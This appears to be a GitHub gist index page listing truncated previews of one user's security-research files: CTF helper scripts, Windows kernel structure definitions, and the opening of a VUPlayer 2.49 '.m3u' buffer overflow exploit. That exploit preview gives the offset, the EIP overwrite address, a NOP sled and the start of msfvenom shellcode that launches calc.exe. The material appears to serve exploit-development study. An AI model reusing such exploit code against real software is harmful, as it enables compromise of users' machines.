Mr. Rc HACKE-RC
🌐
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import time | |
| headers = { | |
| 'Connection': 'keep-alive', | |
| 'Cache-Control': 'max-age=0', | |
| 'Upgrade-Insecure-Requests': '1', | |
| 'Origin': 'http://10.10.228.124', | |
| 'Content-Type': 'application/x-www-form-urlencoded', |
HACKE-RC
/ virtual_query_eg_1.c
Last active
April 19, 2021 09:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| int main() | |
| { | |
| MEMORY_BASIC_INFORMATION info; | |
| int ret; | |
| const void *location; | |
| int *vm = VirtualAlloc(NULL, 8, MEM_COMMIT, PAGE_READONLY); | |
| printf("Address of memory returned by VirtualAlloc is %lu\n", vm); |
HACKE-RC
/ auto_exp_cmps.py
Created
April 30, 2021 15:04
it helps in exploiting cmps automatically i guess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python3 | |
| from r2pipe import open as r2open | |
| from pwn import p64, xor | |
| from sys import argv | |
| from pwn import xor | |
| from os import system as run | |
| import fuckpy3 | |
| do_xor = True if len(argv)>1 else exit() | |
| key = int(argv[1].strip(), 16) if argv[1].startswith("0x") else int("0x"+argv[1].strip(), 16) |
HACKE-RC
/ mangler.py
Created
April 30, 2021 15:06
give '123456789' to any program which plays with it, then get the output and specify it as the first output of the command and then specify your input that you want to mangle in the same way as the second argument
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python3 | |
| from sys import argv | |
| work = True if len(argv)>2 else False | |
| if not work: | |
| exit() | |
| pattern = '123456789' | |
| mangled = argv[1] | |
| res = [] |
HACKE-RC
/ Research_1.md
Created
July 5, 2021 14:23
HACKE-RC
/ exploit.py
Created
August 17, 2021 14:11
VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import pack | |
| offest = 1012 | |
| eip = pack("<I", 0x10022F07) | |
| nops = "\x90"*16 | |
| size = 1100 | |
| # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum | |
| buf = b"" | |
| buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef struct _EPROCESS { | |
| struct _KPROCESS Pcb; | |
| struct _EX_PUSH_LOCK ProcessLock; | |
| PVOID UniqueProcessId; | |
| struct _LIST_ENTRY ActiveProcessLinks; | |
| struct _EX_RUNDOWN_REF RundownProtect; | |
| ULONG Flags2; | |
| ULONG JobNotReallyActive: 1; | |
| ULONG AccountingFolded: 1; | |
| ULONG NewProcessReported: 1; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct _KPROCESS { | |
| struct _DISPATCHER_HEADER Header; | |
| struct _LIST_ENTRY ProfileListHead; | |
| unsigned int DirectoryTableBase; | |
| unsigned long Asid; | |
| struct _LIST_ENTRY ThreadListHead; | |
| unsigned long ProcessLock; | |
| unsigned long Spare0; | |
| unsigned int DeepFreezeStartTime; | |
| struct _KAFFINITY_EX Affinity; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct _TEB { | |
| struct _NT_TIB NtTib; | |
| void *EnvironmentPointer; | |
| struct _CLIENT_ID ClientId; | |
| void *ActiveRpcHandle; | |
| void *ThreadLocalStoragePointer; | |
| struct _PEB *ProcessEnvironmentBlock; | |
| unsigned long LastErrorValue; | |
| unsigned long CountOfOwnedCriticalSections; | |
| void *CsrClientThread; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct _ETHREAD { | |
| struct _KTHREAD Tcb; | |
| union _LARGE_INTEGER CreateTime; | |
| union _LARGE_INTEGER ExitTime; | |
| struct _LIST_ENTRY KeyedWaitChain; | |
| void *ChargeOnlySession; | |
| struct _LIST_ENTRY PostBlockList; | |
| void *ForwardLinkShadow; | |
| void *StartAddress; | |
| struct _TERMINATION_PORT *TerminationPort; |
OlderNewer